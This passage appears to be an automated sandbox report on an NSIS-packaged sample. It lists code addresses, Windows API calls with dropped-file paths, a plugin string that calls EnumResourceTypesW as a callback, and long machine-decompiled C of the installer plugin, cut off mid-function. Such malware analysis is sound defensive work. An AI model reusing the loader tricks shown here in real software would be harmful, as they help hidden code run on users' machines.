                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402b3d
                                                                                                                                                                                            0x00402b42
                                                                                                                                                                                            0x00402b45
                                                                                                                                                                                            0x00402b4b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402b51
                                                                                                                                                                                            0x00402b55
                                                                                                                                                                                            0x00402b5b
                                                                                                                                                                                            0x00402b61
                                                                                                                                                                                            0x00402b63
                                                                                                                                                                                            0x00402b78
                                                                                                                                                                                            0x00402b7b
                                                                                                                                                                                            0x00402b7b
                                                                                                                                                                                            0x00402b7d
                                                                                                                                                                                            0x00402b81
                                                                                                                                                                                            0x00402b93
                                                                                                                                                                                            0x00402b97
                                                                                                                                                                                            0x00402b9a
                                                                                                                                                                                            0x00402b9b
                                                                                                                                                                                            0x00402ba0
                                                                                                                                                                                            0x00402ba0
                                                                                                                                                                                            0x00402ba0
                                                                                                                                                                                            0x00402ba7
                                                                                                                                                                                            0x00402b83
                                                                                                                                                                                            0x00402b8b
                                                                                                                                                                                            0x00402b8d
                                                                                                                                                                                            0x00402b8d
                                                                                                                                                                                            0x00402bab
                                                                                                                                                                                            0x00402baf
                                                                                                                                                                                            0x00402bb2
                                                                                                                                                                                            0x00402bb7
                                                                                                                                                                                            0x00402bbe
                                                                                                                                                                                            0x00402bbe
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402bb7
                                                                                                                                                                                            0x00402b65
                                                                                                                                                                                            0x00402b68
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402b6e
                                                                                                                                                                                            0x00402b71
                                                                                                                                                                                            0x00402b72
                                                                                                                                                                                            0x00401cff
                                                                                                                                                                                            0x00401cff
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402bce
                                                                                                                                                                                            0x00402bd1
                                                                                                                                                                                            0x00402bd4
                                                                                                                                                                                            0x004016ed
                                                                                                                                                                                            0x004016ef
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004016ef
                                                                                                                                                                                            0x00402bda
                                                                                                                                                                                            0x00402bde
                                                                                                                                                                                            0x00402c03
                                                                                                                                                                                            0x00402c08
                                                                                                                                                                                            0x00402c0c
                                                                                                                                                                                            0x00402c1e
                                                                                                                                                                                            0x00402c25
                                                                                                                                                                                            0x00402c26
                                                                                                                                                                                            0x00402c0e
                                                                                                                                                                                            0x00402c0e
                                                                                                                                                                                            0x00402c12
                                                                                                                                                                                            0x00402c12
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402c0c
                                                                                                                                                                                            0x00402be0
                                                                                                                                                                                            0x00402be4
                                                                                                                                                                                            0x00402bf9
                                                                                                                                                                                            0x00402986
                                                                                                                                                                                            0x00402986
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402986
                                                                                                                                                                                            0x00402bee
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402c30
                                                                                                                                                                                            0x00402c34
                                                                                                                                                                                            0x00402c34
                                                                                                                                                                                            0x00402c36
                                                                                                                                                                                            0x00402c87
                                                                                                                                                                                            0x00402c89
                                                                                                                                                                                            0x00402c8e
                                                                                                                                                                                            0x00402c90
                                                                                                                                                                                            0x00402cd0
                                                                                                                                                                                            0x00402cd0
                                                                                                                                                                                            0x00402cd2
                                                                                                                                                                                            0x00402cd4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402cd4
                                                                                                                                                                                            0x00402c92
                                                                                                                                                                                            0x00402c98
                                                                                                                                                                                            0x00402c9d
                                                                                                                                                                                            0x00402c9e
                                                                                                                                                                                            0x00402c9f
                                                                                                                                                                                            0x00402ca1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402ca3
                                                                                                                                                                                            0x00402ca7
                                                                                                                                                                                            0x00402ca8
                                                                                                                                                                                            0x00402ca9
                                                                                                                                                                                            0x00402cad
                                                                                                                                                                                            0x00402cb1
                                                                                                                                                                                            0x00402cb2
                                                                                                                                                                                            0x00402cb4
                                                                                                                                                                                            0x00402cb6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402cbd
                                                                                                                                                                                            0x00402cc2
                                                                                                                                                                                            0x00402cc3
                                                                                                                                                                                            0x00402cc4
                                                                                                                                                                                            0x00402cc8
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402cc8
                                                                                                                                                                                            0x00402c38
                                                                                                                                                                                            0x00402c38
                                                                                                                                                                                            0x00402c3b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402c4a
                                                                                                                                                                                            0x00402c4c
                                                                                                                                                                                            0x00402c52
                                                                                                                                                                                            0x00402c56
                                                                                                                                                                                            0x00402c59
                                                                                                                                                                                            0x00402c5e
                                                                                                                                                                                            0x00402c60
                                                                                                                                                                                            0x00402c65
                                                                                                                                                                                            0x00402c70
                                                                                                                                                                                            0x00402c75
                                                                                                                                                                                            0x00402987
                                                                                                                                                                                            0x00402987
                                                                                                                                                                                            0x0040169c
                                                                                                                                                                                            0x0040169c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00402cdd
                                                                                                                                                                                            0x00402ce3
                                                                                                                                                                                            0x00402ce9
                                                                                                                                                                                            0x00402ced
                                                                                                                                                                                            0x00402cf6
                                                                                                                                                                                            0x00402cf6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • PostQuitMessage.USER32(?), ref: 004015D6
                                                                                                                                                                                            • Sleep.KERNELBASE(00000001,?,?,?,?), ref: 0040160D
                                                                                                                                                                                            • SetForegroundWindow.USER32 ref: 00401619
                                                                                                                                                                                            • ShowWindow.USER32(000103FE), ref: 004016B7
                                                                                                                                                                                            • ShowWindow.USER32(000203D0,?), ref: 004016CC
                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004016DF
                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401749
                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\drvelens\anskrevne\Vrvleversenes\lsernes\Volantly,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,00000000,000000F0), ref: 00401780
                                                                                                                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 004017CB
                                                                                                                                                                                            • GetFullPathNameA.KERNEL32(00000000,00000400,00000000,?,?,000000E3,C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll), ref: 00401821
                                                                                                                                                                                            • GetShortPathNameA.KERNEL32(00000000,00000000,00000400), ref: 0040186A
                                                                                                                                                                                            • SearchPathA.KERNEL32(?,00000000,?,00000400,00000400,?,000000FF), ref: 0040188A
                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\drvelens\anskrevne\Vrvleversenes\lsernes\Volantly,00000000,00000000,00000031,00000400,00000000,000000EF), ref: 004018F4
                                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\drvelens\anskrevne\Vrvleversenes\lsernes\Volantly,00000000,00000000,00000031,00000400,00000000,000000EF), ref: 0040191C
                                                                                                                                                                                            • SetFileTime.KERNELBASE(00000000,000000FF,?,000000FF,?,00000000,?,?,000000EA,00000000,Call,40000000), ref: 00401A28
                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 00401A2F
                                                                                                                                                                                            • lstrcatA.KERNEL32(Call,00000000,Call,000000E9), ref: 00401A50
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsm8742.tmp$C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll$C:\Users\user\AppData\Roaming\drvelens\anskrevne\Vrvleversenes\lsernes\Volantly$Call$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                                                                                                                                                                            • API String ID: 3895412863-1071769588
                                                                                                                                                                                            • Opcode ID: 30252f340698317b47ee69960c275773e0aafb96e69b6e25c8a76550d8fb8f8e
                                                                                                                                                                                            • Instruction ID: 58558678299e95fa68e0d85c7c2e3af7611e9af1e57c9f0e55b4d6ed5b6ee0cc
                                                                                                                                                                                            • Opcode Fuzzy Hash: 30252f340698317b47ee69960c275773e0aafb96e69b6e25c8a76550d8fb8f8e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8ED1E770208315ABD710BB259E45E3F36A8EF81718F10463FF952B22E1D77CD902966E
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 6EE82288 Relevance: 25.2, APIs: 13, Strings: 1, Instructions: 667stringlibrarymemoryCOMMONCrypto
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                            			E6EE82288() {
				CHAR* _t236;
				void* _t238;
				signed int _t239;
				char _t240;
				char _t241;
				void _t242;
				CHAR* _t243;
				void* _t249;
				struct HINSTANCE__* _t250;
				CHAR* _t251;
				int _t252;
				CHAR* _t253;
				signed short _t255;
				CHAR* _t259;
				void* _t260;
				CHAR** _t261;
				intOrPtr _t264;
				void* _t272;
				signed int _t273;
				CHAR* _t274;
				CHAR* _t276;
				CHAR* _t279;
				void* _t281;
				CHAR* _t282;
				void _t283;
				signed int _t287;
				void* _t288;
				void* _t291;
				CHAR* _t298;
				signed int _t299;
				CHAR* _t303;
				CHAR* _t305;
				CHAR* _t306;
				CHAR* _t307;
				CHAR* _t312;
				CHAR* _t313;
				char _t319;
				CHAR* _t320;
				char _t323;
				signed int _t333;
				void* _t335;
				CHAR* _t336;
				CHAR* _t337;
				void _t338;
				CHAR* _t341;
				CHAR* _t343;
				signed int _t345;
				signed int _t346;
				void* _t347;
				void* _t348;
				void* _t349;
				signed int _t355;
				CHAR* _t360;
				void* _t361;
				signed int _t368;
				signed int _t369;
				CHAR* _t370;
				void* _t371;
				CHAR* _t377;
				signed int _t379;
				CHAR* _t380;
				void* _t382;
				void* _t383;
				CHAR* _t384;
				CHAR* _t385;
				CHAR* _t386;
				CHAR* _t387;
				struct HINSTANCE__* _t388;
				CHAR* _t390;
				void* _t391;
				void* _t392;

				 *(_t392 + 0x1c) = 0;
				_t382 = 0;
				 *(_t392 + 0x34) = 0;
				 *(_t392 + 0x30) = 0;
				 *(_t392 + 0x18) = 0;
				 *(_t392 + 0x2c) = 0;
				 *(_t392 + 0x3c) = 0;
				 *(_t392 + 0x28) = 0;
				_t236 = E6EE812C6();
				 *(_t392 + 0x14) = _t236;
				_t312 = _t236;
				 *(_t392 + 0x38) = E6EE812C6();
				_t238 = E6EE8152B();
				_t391 = _t238;
				 *(_t392 + 0x44) = _t238;
				_t383 = _t238;
				 *(_t392 + 0x24) = _t391;
				 *((intOrPtr*)(_t392 + 0x48)) = 2;
				_t239 = 0;
				while(1) {
					_t368 = _t239;
					 *(_t392 + 0x40) = _t368;
					if(_t239 != 0 && _t382 == 0) {
						break;
					}
					_t240 =  *_t391;
					 *((char*)(_t392 + 0x13)) = _t240;
					_t241 = _t240;
					_t319 = _t241;
					if(_t319 == 0) {
						_t169 = _t392 + 0x1c;
						 *_t169 =  *(_t392 + 0x1c) | 0xffffffff;
						__eflags =  *_t169;
						L132:
						_t369 = _t368;
						if(_t369 == 0) {
							_t370 = 0;
							 *_t312 = 0;
							__eflags = _t382;
							if(_t382 == 0) {
								_t281 = GlobalAlloc(0x40, 0x14a4); // executed
								_t382 = _t281;
								_t370 = 0;
								__eflags = 0;
								 *(_t382 + 0x810) = 0;
								 *(_t382 + 0x814) = 0;
							}
							_t242 =  *(_t392 + 0x34);
							_t177 = _t382 + 8; // 0x8
							_t320 = _t177;
							_t178 = _t382 + 0x408; // 0x408
							_t384 = _t178;
							 *_t382 = _t242;
							 *_t320 = _t370;
							 *_t384 = _t370;
							 *(_t382 + 0x808) = _t370;
							 *(_t382 + 0x80c) = _t370;
							 *(_t382 + 4) = _t370;
							_t243 = _t242 - _t370;
							__eflags = _t243;
							if(_t243 == 0) {
								__eflags = _t312 -  *(_t392 + 0x14);
								if(_t312 ==  *(_t392 + 0x14)) {
									goto L154;
								}
								_t390 = _t370;
								GlobalFree(_t382);
								_push( *(_t392 + 0x14));
								_t382 = E6EE81326();
								__eflags = _t382;
								if(_t382 == 0) {
									goto L154;
								} else {
									goto L147;
								}
								while(1) {
									L147:
									_t272 =  *(_t382 + 0x14a0);
									__eflags = _t272;
									if(_t272 == 0) {
										break;
									}
									_t390 = _t382;
									_t382 = _t272;
								}
								__eflags = _t390;
								if(_t390 != 0) {
									_t187 =  &(_t390[0x14a0]);
									 *_t187 = _t390[0x14a0] & 0x00000000;
									__eflags =  *_t187;
								}
								_t273 =  *(_t382 + 0x810);
								__eflags = _t273 & 0x00000008;
								if((_t273 & 0x00000008) == 0) {
									_t333 = 2;
									_t274 = _t273 | _t333;
									__eflags = _t274;
									 *(_t382 + 0x810) = _t274;
								} else {
									_t382 = E6EE812D5(_t382);
									 *(_t382 + 0x810) =  *(_t382 + 0x810) & 0xfffffff5;
								}
								goto L154;
							} else {
								_t276 = _t243 - 1;
								__eflags = _t276;
								if(_t276 == 0) {
									L143:
									lstrcpyA(_t320,  *(_t392 + 0x38));
									L144:
									lstrcpyA(_t384,  *(_t392 + 0x14));
									L154:
									_t312 =  *(_t392 + 0x14);
									L155:
									_t239 =  *(_t392 + 0x1c);
									_t391 = _t391 + 1;
									 *(_t392 + 0x24) = _t391;
									_t383 = _t391;
									if(_t239 != 0xffffffff) {
										continue;
									}
									break;
								}
								_t279 = _t276 - 1;
								__eflags = _t279;
								if(_t279 == 0) {
									goto L144;
								}
								__eflags = _t279 != 1;
								if(_t279 != 1) {
									goto L154;
								}
								goto L143;
							}
						}
						_t371 = _t369 - 1;
						if(_t371 == 0) {
							_t282 =  *(_t392 + 0x30);
							if( *(_t392 + 0x2c) == _t371) {
								_t282 = _t282 - 1;
							}
							 *(_t382 + 0x814) = _t282;
						}
						goto L154;
					}
					_t335 = _t319 - 0x23;
					if(_t335 == 0) {
						_t336 =  *(_t392 + 0x1c);
						__eflags = _t383 -  *(_t392 + 0x44);
						if(_t383 <=  *(_t392 + 0x44)) {
							L29:
							__eflags =  *(_t392 + 0x28);
							if( *(_t392 + 0x28) != 0) {
								L15:
								_t337 = _t336;
								__eflags = _t337;
								if(_t337 == 0) {
									_t283 =  *((intOrPtr*)(_t392 + 0x13));
									while(1) {
										__eflags = _t283 - 0x22;
										if(_t283 != 0x22) {
											break;
										}
										_t391 = _t391 + 1;
										__eflags =  *(_t392 + 0x28);
										_t383 = _t391;
										if( *(_t392 + 0x28) == 0) {
											__eflags = 1;
											 *(_t392 + 0x28) = 1;
											L121:
											 *_t312 =  *_t391;
											_t312 =  &(_t312[1]);
											goto L155;
										}
										_t157 = _t392 + 0x28;
										 *_t157 =  *(_t392 + 0x28) & 0x00000000;
										__eflags =  *_t157;
										_t283 =  *_t391;
									}
									__eflags = _t283 - 0x2a;
									if(_t283 == 0x2a) {
										_t287 = 2;
										 *(_t392 + 0x34) = _t287;
										L129:
										_t385 =  *(_t392 + 0x14);
										L130:
										_t312 = _t385;
										goto L155;
									}
									__eflags = _t283 - 0x2d;
									if(_t283 == 0x2d) {
										L117:
										_t338 =  *_t391;
										__eflags = _t338 - 0x2d;
										if(_t338 != 0x2d) {
											L122:
											_t288 = _t391 + 1;
											__eflags =  *_t288 - 0x3a;
											if( *_t288 != 0x3a) {
												goto L121;
											}
											__eflags = _t338 - 0x2d;
											if(_t338 == 0x2d) {
												goto L121;
											}
											__eflags = 1;
											 *(_t392 + 0x34) = 1;
											L125:
											_t385 =  *(_t392 + 0x14);
											_t391 = _t288;
											__eflags = _t312 - _t385;
											if(_t312 <= _t385) {
												 *( *(_t392 + 0x38)) = 0;
											} else {
												 *_t312 = 0;
												lstrcpyA( *(_t392 + 0x3c), _t385);
											}
											goto L130;
										}
										_t288 = _t383 + 1;
										__eflags =  *_t288 - 0x3e;
										if( *_t288 != 0x3e) {
											goto L122;
										}
										 *(_t392 + 0x34) = 3;
										goto L125;
									}
									__eflags = _t283 - 0x3a;
									if(_t283 != 0x3a) {
										goto L121;
									}
									goto L117;
								}
								_t341 = _t337 - 1;
								__eflags = _t341;
								if(_t341 == 0) {
									_t313 =  *(_t392 + 0x30);
									L49:
									_t291 = _t241 + 0xffffffde;
									__eflags = _t291 - 0x55;
									if(_t291 > 0x55) {
										goto L129;
									}
									_t76 = _t291 + 0x6ee82b1c; // 0x6ee8402c
									switch( *((intOrPtr*)(( *_t76 & 0x000000ff) * 4 +  &M6EE82A94))) {
										case 0:
											__esi =  *(__esp + 0x14);
											__ecx =  *(__esp + 0x14);
											__dl =  *((intOrPtr*)(__esp + 0x13));
											while(1) {
												__ebp = __ebp + 1;
												__al =  *__ebp;
												__eflags = __al - __dl;
												if(__al != __dl) {
													goto L87;
												}
												L86:
												__eflags =  *(__ebp + 1) - __dl;
												if( *(__ebp + 1) != __dl) {
													L91:
													 *__ecx = 0;
													__esi = E6EE812AF(__esi);
													goto L92;
												}
												L87:
												__eflags = __al;
												if(__al == 0) {
													goto L91;
												}
												__eflags = __al - __dl;
												if(__al == __dl) {
													__ebp = __ebp + 1;
													__eflags = __ebp;
												}
												__al =  *__ebp;
												 *__ecx =  *__ebp;
												__ecx = __ecx + 1;
												__ebp = __ebp + 1;
												__al =  *__ebp;
												__eflags = __al - __dl;
												if(__al != __dl) {
													goto L87;
												}
												goto L86;
											}
										case 1:
											L46:
											 *(_t392 + 0x18) = 1;
											goto L129;
										case 2:
											 *(__esp + 0x18) =  *(__esp + 0x18) | 0xffffffff;
											goto L129;
										case 3:
											 *(__esp + 0x18) =  *(__esp + 0x18) & 0;
											__eax = 0;
											 *(__esp + 0x20) =  *(__esp + 0x20) & 0;
											__ebx = __ebx + 1;
											__eax = 1;
											 *(__esp + 0x30) = __ebx;
											 *((intOrPtr*)(__esp + 0x2c)) = 1;
											goto L129;
										case 4:
											__eflags =  *(__esp + 0x20);
											if( *(__esp + 0x20) != 0) {
												goto L129;
											}
											 *(__esp + 0x24) = __ebp;
											__esi = E6EE812C6();
											__eax = __esp + 0x24;
											_push(__esi);
											__eax = E6EE81B4C(__eax);
											_push(__edx);
											_push(__eax);
											__eax = E6EE8144D(__ecx);
											__esp = __esp + 0xc;
											goto L80;
										case 5:
											 *(__esp + 0x20) =  *(__esp + 0x20) + 1;
											goto L129;
										case 6:
											_push(7);
											goto L74;
										case 7:
											_push(0x19);
											goto L101;
										case 8:
											__eax = 0;
											__eax = 1;
											__edx = 1;
											goto L58;
										case 9:
											_push(0x15);
											goto L101;
										case 0xa:
											_push(0x16);
											goto L101;
										case 0xb:
											_push(0x18);
											goto L101;
										case 0xc:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L69;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__edx = 1;
											goto L61;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__edx = 1;
											goto L75;
										case 0xf:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L73;
										case 0x10:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L65;
										case 0x11:
											_push(3);
											goto L74;
										case 0x12:
											_push(0x17);
											L101:
											_pop(__esi);
											goto L102;
										case 0x13:
											__eax = __esp + 0x24;
											__eax = E6EE81B4C(__esp + 0x24);
											_push(0xb);
											_pop(__esi);
											__ecx = __eax + 1;
											__eflags = __eax + 1 - __esi;
											_push("true");
											_pop(__ecx);
											__esi =  >=  ? __eax + 1 : __esi;
											__esi = __eax + __esi;
											__eflags = __esi;
											L80:
											__ebp =  *(__esp + 0x24);
											goto L93;
										case 0x14:
											__esi = __esi | 0xffffffff;
											goto L102;
										case 0x15:
											 *((intOrPtr*)(__esp + 0x3c)) =  *((intOrPtr*)(__esp + 0x3c)) + 1;
											_push(3);
											goto L74;
										case 0x16:
											__eax = 0;
											goto L75;
										case 0x17:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L71;
										case 0x18:
											_t342 =  *(_t382 + 0x814);
											__eflags = _t342 - _t313;
											_push("true");
											_t294 =  <=  ? _t313 : _t342;
											 *(_t392 + 0x1c) =  *(_t392 + 0x1c) & 0;
											 *(_t392 + 0x24) =  *(_t392 + 0x24) & 0;
											_t314 =  <=  ? _t313 : _t342;
											__eflags =  *(_t392 + 0x38) - 3;
											 *(_t392 + 0x34) =  <=  ? _t313 : _t342;
											__eflags = _t342 - (0 |  *(_t392 + 0x38) == 0x00000003);
											_pop(_t297);
											_t374 =  !=  ? _t297 :  *(_t392 + 0x30);
											 *(_t392 + 0x2c) =  !=  ? _t297 :  *(_t392 + 0x30);
											goto L129;
										case 0x19:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											L58:
											_push(2);
											_pop(__ecx);
											 *(__esp + 0x18) = __ecx;
											goto L75;
										case 0x1a:
											L69:
											_push(5);
											goto L74;
										case 0x1b:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											L61:
											_push(3);
											_pop(__esi);
											 *(__esp + 0x18) = __esi;
											goto L75;
										case 0x1c:
											__eax = 0;
											__eax = 1;
											goto L75;
										case 0x1d:
											L73:
											_push(6);
											goto L74;
										case 0x1e:
											L65:
											_push(2);
											goto L74;
										case 0x1f:
											__eax = __esp + 0x24;
											__eax = E6EE81B4C(__esp + 0x24);
											__ebp =  *(__esp + 0x28);
											__esi = __eax + 1;
											L92:
											_pop(__ecx);
											L93:
											__eflags = __esi;
											if(__esi == 0) {
												goto L129;
											}
											L102:
											__ecx =  *(__esp + 0x20);
											0 = 1;
											 *((intOrPtr*)(__esp + 0x2c)) = 1;
											__eflags = __ecx;
											if(__ecx != 0) {
												__eflags = __ecx - 1;
												if(__ecx == 1) {
													__eax = __ebx;
													__eax = __ebx << 5;
													__eflags = __eax;
													 *(__eax + __edi + 0x82c) = __esi;
												}
												L109:
												 *(__esp + 0x20) = __ecx;
												goto L129;
											}
											__ebx = __ebx << 5;
											__eax =  *(__ebx + __edi + 0x830);
											__eflags = __eax - 0xffffffff;
											if(__eax <= 0xffffffff) {
												L105:
												__eax = GlobalFree(__eax);
												__ecx =  *(__esp + 0x20);
												L106:
												 *(__ebx + __edi + 0x830) = __esi;
												goto L109;
											}
											__eflags = __eax - 0x19;
											if(__eax <= 0x19) {
												goto L106;
											}
											goto L105;
										case 0x20:
											L71:
											_push(4);
											L74:
											_pop(__eax);
											L75:
											__ecx =  *(0x6ee84090 + __eax * 4);
											__esi = __ebx;
											__esi = __ebx << 5;
											__edx =  ~__edx;
											_push("true");
											asm("sbb edx, edx");
											 *(__esp + 0x30) = 1;
											__edx = __edx & 0x00008000;
											__edx = __edx | __eax;
											0 = 1;
											 *(__esi + __edi + 0x818) = __edx;
											__edx =  *(__esp + 0x1c);
											__eflags = __ecx;
											__eax =  >  ? __ecx : 1;
											__eflags = __edx;
											_pop(__ecx);
											__eax =  <  ? __ecx :  >  ? __ecx : 1;
											 *((intOrPtr*)(__esi + __edi + 0x828)) =  <  ? __ecx :  >  ? __ecx : 1;
											__eflags = __edx - __ecx;
											if(__edx == __ecx) {
												__eax = __esp + 0x24;
												__eax = E6EE81B4C(__esp + 0x24);
												__ebp =  *(__esp + 0x28);
												__edx = __eax + 1;
												 *(__esp + 0x18) = __edx;
											}
											 *(__esi + __edi + 0x830) =  *(__esi + __edi + 0x830) & 0x00000000;
											__ecx = __ebx + 0x41;
											__ecx = __ebx + 0x41 << 5;
											 *(__esi + __edi + 0x81c) = __edx;
											 *((__ebx + 0x41 << 5) + __edi) =  *((__ebx + 0x41 << 5) + __edi) & 0x00000000;
											 *(__esi + __edi + 0x82c) =  *(__esi + __edi + 0x82c) & 0x00000000;
											goto L129;
										case 0x21:
											goto L129;
									}
								}
								_t343 = _t341 - 1;
								__eflags = _t343;
								if(_t343 == 0) {
									_t313 = 0;
									 *(_t392 + 0x30) = 0;
									goto L49;
								}
								__eflags = _t343 != 1;
								if(_t343 != 1) {
									goto L121;
								}
								__eflags = _t241 - 0x6e;
								if(__eflags > 0) {
									_t298 = _t241 - 0x72;
									__eflags = _t298;
									if(_t298 == 0) {
										_push(4);
										L41:
										_pop(_t299);
										L42:
										_t345 =  *(_t382 + 0x810);
										__eflags =  *(_t392 + 0x18) - 1;
										if( *(_t392 + 0x18) != 1) {
											_t346 = _t345 &  !_t299;
											__eflags = _t346;
										} else {
											_t346 = _t345 | _t299;
										}
										 *(_t382 + 0x810) = _t346;
										goto L46;
									}
									_t303 = _t298 - 1;
									__eflags = _t303;
									if(_t303 == 0) {
										_push(0x10);
										goto L41;
									}
									_t347 = 2;
									__eflags = _t303 != _t347;
									if(_t303 != _t347) {
										goto L129;
									}
									_push(0x40);
									goto L41;
								}
								if(__eflags == 0) {
									_push(8);
									goto L41;
								}
								_t305 = _t241 - 0x21;
								__eflags = _t305;
								if(_t305 == 0) {
									 *(_t392 + 0x18) =  ~( *(_t392 + 0x18));
									goto L129;
								}
								_t306 = _t305 - 0x11;
								__eflags = _t306;
								if(_t306 == 0) {
									_t299 = 0x100;
									goto L42;
								}
								_t307 = _t306 - 0x31;
								__eflags = _t307;
								if(_t307 == 0) {
									_t299 = 1;
									goto L42;
								}
								_t348 = 2;
								__eflags = _t307 != _t348;
								if(_t307 != _t348) {
									goto L129;
								} else {
									_push(0x20);
									goto L41;
								}
							}
							 *(_t392 + 0x1c) =  *(_t392 + 0x1c) & 0x00000000;
							 *(_t392 + 0x34) =  *(_t392 + 0x34) & 0x00000000;
							goto L132;
						}
						__eflags =  *((char*)(_t391 - 1)) - 0x3a;
						if( *((char*)(_t391 - 1)) != 0x3a) {
							goto L29;
						}
						__eflags = _t336;
						if(_t336 == 0) {
							goto L15;
						}
						goto L29;
					}
					_t349 = _t335 - 5;
					if(_t349 == 0) {
						__eflags =  *(_t392 + 0x28);
						if( *(_t392 + 0x28) == 0) {
							 *(_t392 + 0x1c) = 1;
							__eflags =  *(_t392 + 0x34) - 3;
							_t360 = (0 |  *(_t392 + 0x34) == 0x00000003) + 1;
							__eflags = _t360;
							 *(_t392 + 0x30) = _t360;
						}
						 *(_t392 + 0x18) =  *(_t392 + 0x18) & 0x00000000;
						_t377 =  *(_t392 + 0x28);
						__eflags = _t377;
						_t351 =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
						 *(_t392 + 0x18) =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
						 *(_t392 + 0x2c) =  *(_t392 + 0x2c) & 0x00000000;
						__eflags = _t377;
						_t353 =  ==  ?  *(_t392 + 0x2c) :  *(_t392 + 0x2c);
						 *(_t392 + 0x2c) =  ==  ?  *(_t392 + 0x2c) :  *(_t392 + 0x2c);
						__eflags = _t377;
						_t355 = 0 | _t377 == 0x00000000;
						 *(_t392 + 0x20) =  *(_t392 + 0x20) & 0x00000000;
						__eflags =  *(_t392 + 0x28);
						_t379 =  ==  ?  *(_t392 + 0x20) :  *(_t392 + 0x20);
						L13:
						 *(_t392 + 0x20) = _t379;
						_t368 =  *(_t392 + 0x40);
						__eflags = _t355;
						if(_t355 != 0) {
							goto L132;
						}
						L14:
						_t336 =  *(_t392 + 0x1c);
						goto L15;
					}
					_t361 = _t349 - 1;
					if(_t361 == 0) {
						_t380 =  *(_t392 + 0x28);
						__eflags = _t380;
						_t363 =  ==  ?  *((void*)(_t392 + 0x48)) :  *(_t392 + 0x1c);
						 *(_t392 + 0x1c) =  ==  ?  *((void*)(_t392 + 0x48)) :  *(_t392 + 0x1c);
						 *(_t392 + 0x18) =  *(_t392 + 0x18) & 0x00000000;
						__eflags = _t380;
						_t365 =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
						 *(_t392 + 0x18) =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
						__eflags = _t380;
